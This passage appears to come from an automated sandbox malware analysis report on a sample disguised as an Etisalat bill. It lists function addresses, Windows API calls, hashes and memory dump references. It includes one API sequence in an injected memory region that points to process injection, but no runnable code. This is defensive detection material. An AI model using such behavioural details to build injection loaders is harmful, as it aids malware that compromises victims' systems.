                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 3902256705-0
                                      • Opcode ID: 35bf882501a8c7512ed74202293525a4271bd29b1dc2b2394f2a68970c593b27
                                      • Instruction ID: 516ed836385544c074979db5c1ef637c6381a68e3eae806a685406a4f3d7c551
                                      • Opcode Fuzzy Hash: 35bf882501a8c7512ed74202293525a4271bd29b1dc2b2394f2a68970c593b27
                                      • Instruction Fuzzy Hash: F9F0D13950021DA7CB20BB58EC029EE7BECDF01350F1008E5F904921A1EFB18A85D7A1
                                      Function 00B8582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 3d9b212a96e850a16a08592156a4d83c20863ae98d461eca268ffcf40c743b4c
                                      • Instruction ID: d68e743bfc43f2247b1094dcc76aa1b8a3b956a9db4f2388950dcf355d60ed7d
                                      • Opcode Fuzzy Hash: 3d9b212a96e850a16a08592156a4d83c20863ae98d461eca268ffcf40c743b4c
                                      • Instruction Fuzzy Hash: 29018471800609EBCF32BF69CC0559F7BE5AF80760F5482A6B8145A1B1DB318A51DB91
                                      Function 00B855D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      • __lock_file.LIBCMT ref: 00B8561B
                                        • Part of subcall function 00B86E4E: __lock.LIBCMT ref: 00B86E71
                                      • __fclose_nolock.LIBCMT ref: 00B85626
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: 37e8d6c12fc0a38b84d4339107de03e04c101a54110d85be8a8bec3234c9a17b
                                      • Instruction ID: f92fcd8978ef61b1d218ba757163b4c69c73c7b247127d57e1eb0ef9e4e0d867
                                      • Opcode Fuzzy Hash: 37e8d6c12fc0a38b84d4339107de03e04c101a54110d85be8a8bec3234c9a17b
                                      • Instruction Fuzzy Hash: B0F0B471800A049BD730BF75880276E77E16F41334F9582C9A415AB1E1DF7C8941DF95
                                      Function 00B681C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00B6558F,?,?,?,?,?), ref: 00B681DA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00B6558F,?,?,?,?,?), ref: 00B6820D
                                        • Part of subcall function 00B678AD: _memmove.LIBCMT ref: 00B678E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_memmove
                                      • String ID:
                                      • API String ID: 3033907384-0
                                      • Opcode ID: 3e1af04a2c1fbe7c52fc72f9691234c227eae1d7ae60fd8646c5c66da3007194
                                      • Instruction ID: b5b15e685d1bc9e30635def29cea2a9eec1365e78a7e9934b1af3ddc5676f0b5
                                      • Opcode Fuzzy Hash: 3e1af04a2c1fbe7c52fc72f9691234c227eae1d7ae60fd8646c5c66da3007194
                                      • Instruction Fuzzy Hash: FF01AD31241244BFEB246A25DD9AF7B3FACEB89760F10816AFD05DE1A0DE319800C671
                                      Function 015E12FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015E1ABB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015E1B51
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015E1B73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction ID: 2ed75724e6c9ef180a725e123d74b21891f6d5d999589c75ce551b98377135b2
                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                      • Instruction Fuzzy Hash: A912ED20E24658C6EB24DF64D8547DEB272FF68300F1090E9910DEB7A4E77A4F81CB5A
                                      Function 00B6F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9ae27f9cc1bb0d31ba8fc345dbade6f90fa1751a842c2325eb46984bdab2677
                                      • Instruction ID: 4a790f584ebcdc2bbf4936a799f1447d6e75adcc881da36a76e2817095ff17da
                                      • Opcode Fuzzy Hash: a9ae27f9cc1bb0d31ba8fc345dbade6f90fa1751a842c2325eb46984bdab2677
                                      • Instruction Fuzzy Hash: 0161BB70A0024A9FCB10EF64D991A7BB7F5EF45300F1480BDE9169B251EB78ED51CB51
                                      Function 00B72123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 72e67e7645cb207474cd153b953b556af364519aa69dca965801b5499a21be95
                                      • Instruction ID: e1a539d239ffd7cca517e77eb99bcb678677e866e2b2d833bd51e79802f52309
                                      • Opcode Fuzzy Hash: 72e67e7645cb207474cd153b953b556af364519aa69dca965801b5499a21be95
                                      • Instruction Fuzzy Hash: 34518F34604604AFCF14EB68C991EBE77E6EF45310F1880E8F91AAB292CB34ED00CB51
                                      Function 00B65C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B65CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 44466830223a80f4a27e5d13356c679dee43e10bf14b3d7fe4bb36afbcbd3903
                                      • Instruction ID: 2b347d21e0edd19ccae836d29b7ddd132dfe84f808796487caf129bbcafc5287
                                      • Opcode Fuzzy Hash: 44466830223a80f4a27e5d13356c679dee43e10bf14b3d7fe4bb36afbcbd3903
                                      • Instruction Fuzzy Hash: DA314C71A00B1AAFCB28DF2DC884A6DB7F5FF48310F148669E81993750D775B960DB90
                                      Function 00BA00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 609c161eba72917db5cca82c50bc6ad06f35aab1c04ae8e9687961c585687536
                                      • Instruction ID: 859879a6eb8ae7f8b2f82d121898b7b27113e8402dc9415530a43c71d828e1c9
                                      • Opcode Fuzzy Hash: 609c161eba72917db5cca82c50bc6ad06f35aab1c04ae8e9687961c585687536
                                      • Instruction Fuzzy Hash: AC41D3745083519FDB24DF14C884B1ABBE0FF45318F1988ACE8999B762C736E885CF52
                                      Function 00B65B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: c2f018723381ed9b9a79b4d3f680f00a4f941672c651999593b6f5d931e5c7d4
                                      • Instruction ID: 6b99fc926c0cd0e8c8c884419aa9e6f8040f9d33a36060f26c3acbe3e65c64ce
                                      • Opcode Fuzzy Hash: c2f018723381ed9b9a79b4d3f680f00a4f941672c651999593b6f5d931e5c7d4
                                      • Instruction Fuzzy Hash: 4A21AE31A00A08EBDF209F51E8867AE7FF8FF11350F25C8AAE495D5010EB71E4A0DB45
                                      Function 00B6C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp
                                      • String ID:
                                      • API String ID: 856254489-0
                                      • Opcode ID: 68797a7f1e5acf589087a01ff25c5e04ad5055052ffec773ad50e6e9d0a9acef
                                      • Instruction ID: 3ca862a68cb637886caca043121efa6889fc4a489db8db8601c5ad1e7d33e387
                                      • Opcode Fuzzy Hash: 68797a7f1e5acf589087a01ff25c5e04ad5055052ffec773ad50e6e9d0a9acef
                                      • Instruction Fuzzy Hash: 99117272904119EBCB14EBA9DC819FEFBF8EF55760F1081A6E851A7190EB349D05CB90
                                      Function 00B6C6AE Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp
                                      • String ID:
                                      • API String ID: 856254489-0
                                      • Opcode ID: 201ac7a85b4103673cdb9dfb36aa90fe725ccbbe53e4c32ddd704d888609111e
                                      • Instruction ID: 381b2829ebbd292b77b2699fa91818f15b782542a118711384bed764c28cabd7
                                      • Opcode Fuzzy Hash: 201ac7a85b4103673cdb9dfb36aa90fe725ccbbe53e4c32ddd704d888609111e
                                      • Instruction Fuzzy Hash: 6D113672D082464FD7118B28DC242EAFFF5AF56720F1940DBC890AB292E3689C81CB81
                                      Function 00B64F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B64D13: FreeLibrary.KERNEL32(00000000,?), ref: 00B64D4D
                                        • Part of subcall function 00B8548B: __wfsopen.LIBCMT ref: 00B85496
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64F6F
                                        • Part of subcall function 00B64CC8: FreeLibrary.KERNEL32(00000000), ref: 00B64D02
                                        • Part of subcall function 00B64DD0: _memmove.LIBCMT ref: 00B64E1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load__wfsopen_memmove
                                      • String ID:
                                      • API String ID: 1396898556-0
                                      • Opcode ID: 814249ce7f57096bb8b7fd81c95f5064d53afe4b212618e9a75bf348f0fc76f6
                                      • Instruction ID: 74990b090b2f78dfe1295fc40d2a4ff1d37ba74e60e07f76226423e28704806a
                                      • Opcode Fuzzy Hash: 814249ce7f57096bb8b7fd81c95f5064d53afe4b212618e9a75bf348f0fc76f6
                                      • Instruction Fuzzy Hash: FF11E731600A09AACF20BF71CC42FAE77E4DF40700F1084B9F545AB2C1DB799A159B50
                                      Function 00BA01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 5c9274aeac22f8fa61a458626499b29339f8a972dd64afdf6c14c5b8ee5fa8ec
                                      • Instruction ID: 605046c369dc6f00fe199ab8f86ae3d76d92b25abde104c145dbeb6bdd75b271
                                      • Opcode Fuzzy Hash: 5c9274aeac22f8fa61a458626499b29339f8a972dd64afdf6c14c5b8ee5fa8ec
                                      • Instruction Fuzzy Hash: 162113B4508341DFCB14DF14C884A1ABBE4FF89314F0489A8E89A57761D736E845CF53
                                      Function 00B65D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00B65807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B65D76
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 744f32270f4694e1b9f57665a8c5750609f8fb3242431bbff99308607730fede
                                      • Instruction ID: f8869905e3e7ee2bc5ce9941424a3bff4fb67c6923b12f89b12fe2a50a16bd2e
                                      • Opcode Fuzzy Hash: 744f32270f4694e1b9f57665a8c5750609f8fb3242431bbff99308607730fede
                                      • Instruction Fuzzy Hash: F0113A31200B059FD3308F15C484F66B7E5FF45750F10C96EE5AA86A90D774E955CB60
                                      Function 00B65BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 8e5742d8604840a39b4b52d433faf62baee0d16ba583a21fff711293b0587678
                                      • Instruction ID: 18cc39094f9612f72f8124acf06e91094996114dfdc037411dcae14d7ffb0913
                                      • Opcode Fuzzy Hash: 8e5742d8604840a39b4b52d433faf62baee0d16ba583a21fff711293b0587678
                                      • Instruction Fuzzy Hash: 6B018FB9600942AFC315EB69C851D2AFBE9FF8A3507148199F819C7712DB34EC21CBE0
                                      Function 00B84A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      • __lock_file.LIBCMT ref: 00B84AD6
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2597487223-0
                                      • Opcode ID: d2e6884dd070077a1dcbe0a4ac2c97f5e1a15f818f1a47eb8fb30589a283b032
                                      • Instruction ID: a5a645643c636af10c71b22916c7a586de7d57cbcf484fd5366ff1974f462e5f
                                      • Opcode Fuzzy Hash: d2e6884dd070077a1dcbe0a4ac2c97f5e1a15f818f1a47eb8fb30589a283b032
                                      • Instruction Fuzzy Hash: 09F0C23194020AABDF61BF74CC063DF76E1AF00325F448598F424AA1F1DB788A50DF51
                                      Function 00B64FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64FDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: e6cbe87c53067f66b2f3cf216d5e0637b791a0e09524159337c3692d5e29944a
                                      • Instruction ID: 2ece863b72228b07c7bd8d2d317f5f2a630a35edd1fbcf12823d39810deb3c0b
                                      • Opcode Fuzzy Hash: e6cbe87c53067f66b2f3cf216d5e0637b791a0e09524159337c3692d5e29944a
                                      • Instruction Fuzzy Hash: CDF01571105B52CFCB349F64E494822BBE1EF143293208ABEE1DA82620C775A840DF40
                                      Function 00B809D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B809F4
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
